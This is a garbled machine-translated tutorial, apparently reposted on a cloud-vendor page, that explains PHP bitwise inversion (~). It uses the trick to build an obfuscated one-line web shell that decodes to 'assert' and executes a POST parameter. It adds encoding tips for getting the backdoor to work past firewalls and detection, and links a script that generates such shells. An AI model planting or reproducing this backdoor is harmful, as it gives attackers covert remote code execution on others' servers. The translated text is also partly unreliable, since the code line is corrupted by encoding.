Use bitwise inversion in PHP (~) Function creation backdoor, code variant Backdoor

Source: Internet
Author: User
Tags bitwise operators

Use bitwise inversion in PHP (~) Function creation backdoor, code variant Backdoor

1) PHP ~ Bitwise operators

Some time ago, a foreigner posted an interesting things on twitter. After accessing a string suspected of garbled characters, it could normally output 1337.

PHP: bitwise operator-http://www.php.net/manual/zh/language.operators.bitwise.php

~ $ ANot (bitwise inversion) sets the bitwise 0 in $ a

1, and vice versa.

 

PHP ini sets error_reporting to use a bitwise value, providing a real example of disabling a bit. All errors except the prompt level should be displayed.

Php. ini is used in this way: E_ALL &~ E_NOTICE

The specific operation method is to first obtain the value of E_ALL: 00000000000000000111011111111111

Then get the value of E_NOTICE: 00000000000000000000000000001000

Then pass ~ Reversed: 11111111111111111111111111110111

Finally, we use the bitwise AND (&) to get the BIT (1) set in both values: 00000000000000000111011111110111

2) analysis and Reproduction

This is the original code implementation effect at that time:

 

When you see this effect, the first thing you think of is to bypass the implementation of backdoors such as firewalls, and then start to consider which encoding method is used?

Later, I used echo directly in the test with Li pujun ~ '1'; and so on, the above 'garbled 'will be directly output '.

 

Then we can start writing a sentence to try the effect:

<? Php $ x = ~ Ÿ ¬ ° «; $ x ($ _ POST [~ ¹ Ï]);?>

Here, the $ x variable is defined as ASSERT, And the password is FF0000, which can be directly linked to the backdoor, because when the bit is reversed out of 'garbled ', we can take another reverse to return the normal value.

3) coding and kill-free

When I reproduce this backdoor, I found that the direct Copy over HTTP status 500, the source is the encoding problem, the above 'garbled 'is actually Western Europe (ISO-8859-15 ).

In the actual process, we have encountered many Backdoors that cannot be linked. The Error 500 is returned because of encoding problems. If the default encoding cannot be identified, save the encoding method as this (GBK \ UTF8 \... cannot be used successfully)

 

 

4) stay at the end

We wrote a small script for easy generation: http://www.bkjia.com/tools/Createbackdoor-1.php

 

How to Use: Createbackdoor-1.php? Pwd = password

 

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.